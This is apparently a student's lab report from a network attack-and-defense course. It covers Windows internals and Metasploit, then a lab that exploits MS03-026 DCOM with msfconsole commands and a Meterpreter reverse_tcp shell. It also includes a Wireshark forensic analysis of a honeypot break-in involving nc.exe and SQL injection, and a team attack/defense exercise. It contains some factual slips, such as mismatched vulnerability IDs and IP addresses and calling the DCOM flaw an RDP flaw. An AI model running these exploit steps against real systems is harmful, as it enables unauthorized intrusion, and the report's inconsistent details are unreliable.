20212810 2021-2022-2《网络攻防实践》第六次作业

20212810 2021-2022-2《网络攻防实践》第六次作业

一.实践内容

1.Windows 基本结构

  • Windows 采用了双模式结构来保护操作系统本身。操作系统核心运行在内核模式,应用程序的代码运行在用户模式下。每当应用程序需要用到系统内核或内核的扩展模块(内核驱动程序)所提供的服务时,应用程序通过硬件指令从用户模式切换到内核模式中;当系统内核完成了所请求的服务以后,控制权又回到用户模式代码。

  • Windows内核分为三层,硬件抽象层(Hardware Abstraction Layer ,简称HAL), HAL之上是内核层,有时候也称为微内核,在内核层之上则是执行体(executive)层。

    硬件抽象层的用意是把所有与硬件相关联的代码逻辑隔离到一个专门的模块中,从而使上面的层次可能做到独立于硬件平台。

    内核层和执行层的分工是,内核层实现操作系统的基本机制,而所有的策略决定则留个执行体。

  • 下表是 Windoows 系统核心组件的文件名:

  • Windows子系统
    Windows子系统包含内核模式和用户模式,内核模式部分核心是Win32k.sys ,包含2部分,窗口管理和图形设备接口,窗口管理负责收集分发消息,控制窗口显示和管理屏幕输出。图形设备接口部分包含各种形状绘制及文本输出功能。用户模式部分包括Windows子系统csrss.exe 以及一组动态链接库(DLL)。Csrss.exe 进程主要负责控制台窗口的功能,以及创建或删除进程和线程等。子系统Dll 则被直接链接到应用程序中,包括kernel32.dll ,user32.dll,gdi32.dll,advapi.dll等,负责实现已经文档化的Windows API函数。

2.Metasploit基本介绍

Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发,代码审计,Web应用程序扫描,社会工程。团队合作,在Metasploit和综合报告提出了他们的发现。通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数百个已知软件漏洞的专业级漏洞攻击工具。当H.D. Moore在2003年发布Metasploit时,计算机安全状况也被永久性地改变了。仿佛一夜之间,任何人都可以成为黑客,每个人都可以使用攻击工具来攻击那些未打过补丁或者刚刚打过补丁的漏洞。软件厂商再也不能推迟发布针对已公布漏洞的补丁了,这是因为Metasploit团队一直都在努力开发各种攻击工具,并将它们贡献给所有Metasploit用户。

  • Metasploit体系框架
    1、基础库
    metasploit 基础库文件位于源码根目录路径下的libraries目录中,包括Rex,framework-core和framework-base三部分。
    Rex是整个框架所依赖的最基础的一些组件,如包装的网络套接字、网络应用协议客户端与服务端实现、日志子系统、渗透攻击支持例程、PostgreSQL 以及MySQL数据库支持等
    framework-core库负责实现所有与各种类型的上层模块及插件的交互接口
    framework-base库扩展了framework-core ,提供更加简单的包装例程,并为处理框架各个方面的
    功能提供了一些功能类,用于支持用户接口与功能程序调用框架本身功能及框架集成模块;
    2、模块
    模块组织按照不同的用途分为6种类型的模块( Modules ) : 辅助模块( Aux)、渗透攻击模块( Exploits)、后渗透攻击模块( Post)、攻击载荷模块( payloads)、编码器模块( Encoders)、空指令模块( Nops)。
    注: payload又称为攻击载荷,主要是用来建立目标机与攻击机稳定连接的,可返回shell ,也可以进行程序注入等。
    3、插件
    插件能够扩充框架的功能,或者组装已有功能构成高级特性的组件。插件可以集成现有的一些外部安全工具,如Nessus、OpenVAS 漏洞扫描器等,为用户接口提供一些新的功能。
    4、接口
    包括msfconsole控制终端、msfcli 命令行、msfgui 图形化界面、armitage 图形化界面以及msfapi远程调用接口。
    5、功能程序:
    metasploit 还提供了一系列可直接运行的功能程序 ,支持渗透测试者与安全人员快速地利用metasploit框架内部能力完成一些特定任务。比如msfpayload、msfencode和msfvenom可以将攻击载荷封装为可执行文件、C语言、JavaScript 语言等多种形式,并可以进行各种类型的编码。

二.实践过程

虚拟机信息:

实验一.动手实践Metasploit windows attacker

任务:使用metasploit软件进行windows远程渗透统计实验

具体任务内容:使用windows Attacker/BT4攻击机尝试对windows Metasploitable靶机上的MS08-067漏洞进行远程渗透攻击,获取目标主机的访问权。

  1. 在 Kali 攻击机终端使用以下命令进入 Metasploit:
    sudo apt-get install metasploit-framework
    msfconsole

    2.使用 MS03-026 作为攻击的目标漏洞:
    use exploit/windows/dcerpc/ms03_026_dcom

    3.使用命令show payloads查看此漏洞的载荷

    4.设置打开反向连接的载荷:set PAYLOAD windows/meterpreter/reverse_tcp
    设置攻击机 IP、设置靶机 IP、开始攻击:


5.如图,回车可以进入受害靶机的shell输入命令行ipconfig查看靶机的IP攻击成功。

实验二. 取证分析实践:解码一次成功的NT系统破解攻击

来自212.116.251.162的攻击者成功攻陷了一台由rfp部署的蜜罐主机172.16.1.106,(主机名为lab.wiretrip.net),要求提取并分析攻击的全部过程。
攻击者使用了什么破解工具进行攻击
攻击者如何使用这个破解工具进入并控制了系统
攻击者获得系统访问权限后做了什么
我们如何防止这样的攻击
你觉得攻击者是否警觉了他的目标是一台蜜罐主机?如果是,为什么。

用wireshark打开云班课老师上传的snort-0204@0117.log文件

攻击者使用了什么破解工具进行攻击?
筛选ip.addr == 213.116.251.162 && ip.addr == 172.16.1.106 ,发现攻击者进行了 HTTP 访问,可以看到攻击者的操作系统:

在 117 号数据包,发现攻击者打开了系统启动文件 boot.ini:

可以看到攻击者试图向服务器获取一个msadcs.dll文件

在 149 号数据包,追踪 TCP 流,可以看到 select * from 等字样,可以知道这是 SQL 注入攻击:

具体查询了一些漏洞描述和攻击工具的相关说明,看不太明白。
在 179 号数据包追踪 TCP 流,可以看到如下指令,攻击者创建了一个 ftpcom 脚本:

攻击者成功进入了系统。往下拉,可以看到到下图所示位置,发生了变化。攻击者建立了一个ftp连接。输入了用户名密码,下载了几个文件。

然后攻击者连接6969端口,获得了访问权限

从1361编号开始,攻击机发起了多次SQL注入攻击,通过修改用户名和口令的方式完成了利用FTP进行网络攻击工具软件nc.exe的注入操作。

然后在编号2339,右键追踪http流,根据add,他想提升权限


攻击者使用了什么破解工具进行攻击?
口令破解工具和nc.exe来实现对目标主机的攻击。
当攻击者获得系统的访问权后做了什么?
对目标主机的文件系统进行了嗅探。
尝试在根目录下创建rdisk,但是没有成功
试图通过删除SAM数据库中的数据(拷贝和删除har.txt)和将自己加到管理员组中的方式来实现提升自己访问权限的目的。
我们如何防止这样的攻击?
1.升级系统到最新的稳定版本
2.及时更新微软官方的漏洞补丁
你觉得攻击者是否警觉了他的目标是一台蜜罐主机?如果是,为什么?
是。攻击者意识到了是蜜罐主机。

**实验三. 团队对抗实践:windows系统远程渗透攻击和分析。

攻方使用metasploit选择漏洞进行攻击,获得控制权。(要求写出攻击方的同学信息、使用漏洞、相关IP地址等)
防守方使用wireshark监听获得的网络数据包,分析攻击过程,获取相关信息。

重复实验一的过程
打开kali的metasploit,选择 metasploitable 中的漏洞进行渗透攻击,获得控制权。

防守方使用wireshark监听获得的网络数据包,分析攻击过程,获取相关信息。
我们分析wireshark抓包的过程。

可以看到攻击地址和靶机地址
源端口4444, 目标端口1042
使用wireshark在一旁嗅探,得到攻击过程中的数据包

攻击发起时间,从第一个ARP请求开始

攻击利用漏洞,从RemoteActivation中可以看出是利用的RDP漏洞

三.学习中遇到的问题及解决

第一个实验中一直没有攻击成功,后来发现是因为指令输入错误。
分析过程比较复杂,百度了一下也不是很理解。

四.实践总结

以后一定要多思考,注重实验过程而不是结果。

posted @ 2022-04-21 21:43  bzhuihui  阅读(45)  评论(0编辑  收藏  举报